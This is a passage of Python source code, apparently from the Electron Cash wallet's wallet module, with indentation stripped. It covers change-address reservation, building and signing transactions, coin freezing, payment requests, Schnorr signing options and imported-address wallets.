input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
''' Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. '''
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo):
''' 'coin' level frozen query. `utxo' is a prevout:n string, or a dict
as returned from get_utxos(). Note: this is set/unset independent of
'address' level freezing. '''
assert isinstance(utxo, (str, dict))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
''' Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable. '''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary = False):
'''Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`. '''
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add( utxo )
def discard(utxo):
self.frozen_coins.discard( utxo )
self.frozen_coins_tmp.discard( utxo )
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation( utxo )
ok += 1
elif isinstance(utxo, dict) and self.is_mine(utxo['address']):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation( txo )
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
